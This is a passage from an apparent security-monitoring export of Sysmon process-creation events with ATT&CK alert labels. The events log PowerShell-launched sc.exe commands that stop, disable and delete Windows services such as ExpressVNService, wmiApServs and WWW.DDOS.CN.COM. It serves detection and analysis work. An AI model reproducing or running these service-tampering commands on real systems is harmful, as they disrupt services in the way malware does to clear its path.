Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.803"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010515c2100}"",""processId"":""1480"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.073",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.758 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c5592100} +ProcessId: 7740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.762148300Z"",""eventRecordID"":""2740"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.758\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c5592100}\r\nProcessId: 7740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.758"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010c5592100}"",""processId"":""7740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.061",8,"ATT&CK: Quick Execution of a Series of 
Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.740 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010d4582100} +ProcessId: 736 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ExpressVNService Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config ExpressVNService Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.743521700Z"",""eventRecordID"":""2739"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.740\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010d4582100}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config ExpressVNService Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.740"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010d4582100}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config ExpressVNService Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.015",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.709 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010f9562100} +ProcessId: 1628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.712010400Z"",""eventRecordID"":""2737"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.709\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010f9562100}\r\nProcessId: 1628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.709"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010f9562100}"",""processId"":""1628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.950",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.662 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001014542100} +ProcessId: 1412 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.664839400Z"",""eventRecordID"":""2734"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.662\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001014542100}\r\nProcessId: 1412\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:29.662"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001014542100}"",""processId"":""1412"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.922",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.629 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001061522100} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.632326400Z"",""eventRecordID"":""2732"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.629\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001061522100}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.629"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001061522100}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.900",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.614 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00109a512100} +ProcessId: 2936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.617110800Z"",""eventRecordID"":""2731"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.614\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00109a512100}\r\nProcessId: 2936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.614"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00109a512100}"",""processId"":""2936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 